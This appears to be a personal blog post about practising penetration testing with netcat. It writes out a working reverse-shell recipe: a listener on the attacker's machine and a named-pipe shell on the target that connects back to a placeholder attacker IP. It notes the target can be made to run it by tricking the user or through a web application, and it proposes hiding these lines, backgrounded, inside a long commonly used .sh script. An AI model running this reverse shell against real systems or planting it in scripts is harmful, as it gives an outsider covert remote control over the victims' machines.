I’ve been exploring different tools to simulate hacking a system and practice penetration testing. Probably, one of the tools that I find most useful (aside from nmap) is the command netcat. This utility is used to read and write data across network connections. I find it interesting that you can actually open up a command shell (or reverse shell) to a remote computer. Upon research (http://pen-testing.sans.org/blog/2013/05/06/netcat-without-e-no-problem/comment-page-1/), you can open up a shell by running the following commands:

From the attacker’s computer, he can open up a listening port:

nc -nvlp 9999                         where 9999 is any port

On the target’s computer, if he can have the following commands executed by either tricking the user or by executing the code through a web application:

mknod /tmp/backpipe p

/bin/sh 0</tmp/backpipe | nc <attackers_ip> 9999 1>/tmp/backpipe

Once, the code is executed on the target, you will see confirmation in the attacker’s shell that a connection has been made. From their, you can executed the usual Linux commands. Take note that it might appear as a blank screen, but in that blank screen, treat it as a Linux shell. That is, type Linux commands and you will see the output.

Now I am exploring other ways to open up a remote shell using the tools readily available on every OS. Probably one of the biggest challenge is how to execute those commands in the victim’s computer. Probably, compromising a .sh script would do. Probably in a very long .sh script such commonly used commands, somehow append the <pipe commands> and add & on it. For the sake of opening ideas in the world of penetration testing, I’ll play around and see if it works.

Advertisements